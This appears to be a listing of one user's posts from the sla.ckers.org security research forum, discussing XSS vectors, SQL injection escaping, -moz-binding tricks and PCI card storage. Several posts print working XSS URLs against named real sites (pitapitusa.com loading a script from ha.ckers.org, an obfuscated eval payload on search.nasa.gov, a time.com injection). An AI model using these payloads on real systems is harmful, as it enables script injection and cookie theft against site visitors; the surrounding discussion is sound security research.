Sla.ckers.org

Pages: 1 2 3 Next
Current Page: 1 of 3
Results 1 - 30 of 66
5 years ago
yawnmoth
<?php header('Content-type: text/plain'); header('Content-Disposition: attachment; filename="plain.txt"'); echo $_GET['input'] ?>

An automated scanner I've been playing around with identified that as a possible XSS exploit. I disagree with that assertion. Sure, maybe if you tell IE, via the download prompt, to open it in IE, maybe HTML can be rendered, but that's more
Forum: XSS Info
5 years ago
yawnmoth
<script> document.location.href = prompt('enter a URL',''); </script>

An automated scanner I've been playing around with identified that as a possible XSS exploit and as an "open redirect". I disagree with both assertions. Sure, you could type in javascript:alert(1) into the prompt and get some javascript to run on the page but that's hardly XSS, imho, given that it re
Forum: XSS Info
5 years ago
yawnmoth
Just used Wireshark to confirm and... you're right. The XSS cheat sheet lists several Google "feeling lucky" things but I thought they had stopped working - guess they only stopped working in client side code.
Forum: XSS Info
5 years ago
yawnmoth
If you type www>digg>com into the Firefox address bar, you get sent to www.digg.com. <a href="www>digg>com">, however, does not do the same thing - nor does http://www>digg>com or <script>location = 'www>digg>com';</script>. Given the restrictions, this doesn't really seem useful for XSS, but maybe it is and I've just missed something?
Forum: XSS Info
5 years ago
yawnmoth
That really depends on the context.

SELECT * FROM whatever WHERE id = x

SQL injecting that doesn't require any characters that htmlspecialchars would escape. If you wanted to query someone by a username that had double quotes in it, you could do concat(char(...), char(...), ...)

Also...

SELECT * FROM whatever WHERE id = 'x'

htmlspecialchars, by default, won't protect against that,
Forum: SQL and Code Injection
5 years ago
yawnmoth
Stefan Esser described the attack on his blog: http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/

> Because MySQL does not compare strings in binary mode by default more relaxed
> comparison rules are used. One of these relaxations is that trailing space
> characters are ignored during the comparison."

My question is... what characters co
Forum: SQL and Code Injection
5 years ago
yawnmoth
http://www.time.com/time/searchresults?N=0&Ntk=NoBody&Nty=1&Nr=OR(1=1)&Ntt=zzz%27;a/**/setter//&x=15&y=12&srchCat=Full+Archive If you view the source and do a search within the source for 'zzz', you'll find it in some javascript. You can break out of the javascript with a single quote, but... if you try to include (, ), or =, then the javascript portion disappears.
Forum: XSS Info
5 years ago
yawnmoth
I just tried adding 'zzz' before the XML and it didn't work: http://www.frostjedi.com/terra/test.php If you have better luck, let me know! :)
Forum: XSS Info
5 years ago
yawnmoth
> cross-site -moz-binding support (including data: URLs from non chrome: origins) has been removed from final Firefox 3.0 release. source: http://hackademix.net/2007/12/25/merry-xssmas/#comment-9144 I asked about data url's for -moz-binding before: http://sla.ckers.org/forum/read.php?2,20939
Forum: XSS Info
5 years ago
yawnmoth
-moz-binding now requires the XML be hosted locally in order to work. Having a locally hosted file isn't, itself, a problem - lots of websites already let you upload stuff to them. My question is... is it possible to construct an image that is, simultaneously, valid XML, so that I might use it on such sites via -moz-binding? I tried appending some XML to an image, figuring that Firefox's X
Forum: XSS Info
5 years ago
yawnmoth
From the Posting tab in phpBB3's ACP: "{TEXT}: Any text, including foreign characters, numbers, etc… You should not use this token in HTML tags. Instead try to use IDENTIFIER or SIMPLETEXT." "{SIMPLETEXT}: Characters from the latin alphabet (A-Z), numbers, spaces, commas, dots, minus, plus, hyphen and underscore" "{IDENTIFIER}: Characters from the latin alphabet
Forum: XSS Info
6 years ago
yawnmoth
I'm trying to get this working, myself, and am having some difficulty: http://www.frostjedi.com/terra/scripts/demo/moz-binding.php Here's the source code to that file: <div style="-moz-binding: url(data:text/xml;charset=utf-8,<?php echo urlencode(utf8_encode('<?xml version="1.0"?> <bindings xmlns="http://www.mozilla.org/xbl"> <binding id
Forum: XSS Info
6 years ago
yawnmoth
Kyo Wrote:
-------------------------------------------------------
> are you literally pasting that in there, with the
> PHP unparsed?

No. The PHP code is in a *.php file running on Apache with PHP5 running via CGI. You can view it here: http://www.frostjedi.com/terra/scripts/demo/moz-binding.php My question still stands. Why doesn't that page yield a javascript popup? I've t
Forum: XSS Info
6 years ago
yawnmoth
I'm trying to play around with the inline data url binding thing as described at http://sla.ckers.org/forum/read.php?2,20939 and am having some difficulty. Here's what I've got, thus far: <div style="-moz-binding: url(data:text/xml;charset=utf-8,<?php echo urlencode('<?xml version="1.0"?> <bindings xmlns="http://www.mozilla.org/xbl"> <binding
Forum: XSS Info
6 years ago
yawnmoth
Gareth Heyes Wrote:
-------------------------------------------------------
> inline moz-binding dude
>
> OR/AND
>
> expressions in IE

I was doing an inline moz-binding. Unless there's maybe a syntax error? It looks correct to me. And since I'm trying to get this working in FF, expressions are kinda out. Anyway, Kyo's suggestion worked, with modification: zz
Forum: XSS Info
6 years ago
yawnmoth
zz If you enter that into the Plain Text tab, when making a new post, click on the Preview tab, and then, in FF, highlight the "zz", right click, and then click on "View Selection Source" from the resultant menu, you'll see that the style attribute is being successfully added - the only thing is that FF3 doesn't, iirc, let you link to offsite *.xml's, anymore, with -moz-bind
Forum: XSS Info
6 years ago
yawnmoth
Heh. Didn't realize it was doing that! Anyway, this works: http://www.pitapitusa.com/main.php/%22%3E%3Cscript%20src=http:/%26%2347;ha.ckers.org/s.js%3E%3C/script%3E
Forum: XSS Info
6 years ago
yawnmoth
I'm trying to present a case for why having something like localhost.google.com actually point to localhost is a bad idea and am having some difficulty. If, on localhost, you have an XSS'able application, then you can do an XSS attack against, say, http://localhost.google.com/?a=<script>...</script> and steal cookies, send XmlHttpRequests with cookies, etc. The problem is... wha
Forum: XSS Info
6 years ago
yawnmoth
It seems to me like some of these vectors really ought to be mentioned in the XSS cheat sheet. Is that just not being maintained, anymore, or is there some other reason that these aren't being added to it? Maybe someone else should take it on?

Kyo Wrote:
-------------------------------------------------------
> I don't like to brag, but I'm a fucking genius :P
>
> http://wocar
Forum: XSS Info
6 years ago
yawnmoth
http://www.pitapitusa.com/main.php/%22%3E%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E If you view that link, directly, in either IE or FF, the whole "You Got Stallown3d!1" doesn't get displayed. If, however, you view the source, in either IE or FF, and then copy / paste it to a new file, it does get displayed? Any ideas as to what's happening?
Forum: XSS Info
6 years ago
yawnmoth
id Wrote:
-------------------------------------------------------
> break the CC number into two parts, hash them
> both, tada.

ie. substring($credit_card_num, 0, -4) for the first part, and substring($credit_card_num, -4) for the last part? That does seem like a good approach :)
Forum: Privacy
6 years ago
yawnmoth
My first question is... does the PCI require that retail stores store credit card numbers? http://www.darkreading.com/document.asp?doc_id=135602 suggests that they are. If so, what does the PCI say about storing them encrypted vs. storing them unencrypted? I can see virtue to both, actually. If you store credit card numbers encrypted or hashed, it's a lot harder for the database administrator
Forum: Privacy
6 years ago
yawnmoth
I think he did notice that line (hence his trying 0xbf27). I think the problem was with how he was trying to encode it. He tried to encode it, maybe, as %bf27 or %ubf27 as opposed to %bf%27. The Code Red worm used %ubf27 style urlencode()'ing, so it's not all that unreasonable to assume that it'd work here... Maybe that style of encoding only works on IIS? edit: removed url.
Forum: SQL and Code Injection
6 years ago
yawnmoth
tx Wrote:
-------------------------------------------------------
>
>
> It's better because then they will have to face
> their poor programming practices and (hopefully)
> learn a little something. I agree that
> magic_quotes mainly helps programmers who don't
> really understand how it helps them, but I think
> that when their application is attacked or
> (
Forum: News and Links
6 years ago
yawnmoth
It seems to me that .NET's protection encourages lazy development, too. Why should I bother escaping a < by turning it into a &lt; when .NET will block the request for me? That might have the same portability issues as magic_quotes, as well. Also, just ftr, I never said magic quotes was effective at preventing XSS, heh. It can certainly obfuscate it, requiring you do /xss/.source as
Forum: News and Links
6 years ago
yawnmoth
According to wikipedia.org, " said he used the ip2location database that has "2,668,095 different organizations … which I am using to connect IP#'s to organization names. Within the IP2Location database, there are 187,529 different organizations with at least one anonymous Wikipedia edit."". My question is, how does ip2location http://www.ip2location.com/free.asp do it?
Forum: Networking
6 years ago
yawnmoth
It's interesting... .NET blocks requests that look like they might be XSS attacks, and it's praised, yet PHP's magic_quotes_gpc directive, which attempts to provide some protection against SQL injection (and, in my experience, often does), is widely criticized. Why is this? Would it be better if PHP spit out a 403 forbidden error when ' was used in a query, just as how .NET throws that o
Forum: News and Links
6 years ago
yawnmoth
From the FAQ: "Is this your own database, or a front end for someone else's services? The database is our own and was generated from scratch." How do you build a database like this in the first place? None of the *.gtld-servers.net (authoritative .com DNS) servers allow AXFR zone requests. The people at OpenDNS could probably build their own database by caching domains / IP addr
Forum: News and Links
6 years ago
yawnmoth
AVG Anti-Virus 8 added a new feature - LinkScanner [1] - that prefetches webpages. Using Wireshark, I've confirmed that it downloads them and doesn't just check the domain name against a database, as Firefox's anti-phishing feature does. Given [2], this seems, quite simply, like a bad idea. Thankfully, AVG seems to include its own client. The User-Agent string of the requests i
Forum: News and Links
6 years ago
yawnmoth
http://search.nasa.gov/search/search.jsp?nasaInclude=%22+onclick%3D%22e+setter%3Deval%2Cu+setter%3Dunescape%2Ce%3Du%3D%27%2561%256c%2565%2572%2574%2528%2527%2558%2553%2553%2527%2529%27&entqr=0&output=xml_no_dtd&sort=date%3AD%3AL%3Ad1&ud=1&site=nasa_collection&client=nasa_production&ie=UTF-8&oe=UTF-8&simple_start=&news_start=&images_start=&videos_star
Forum: XSS Info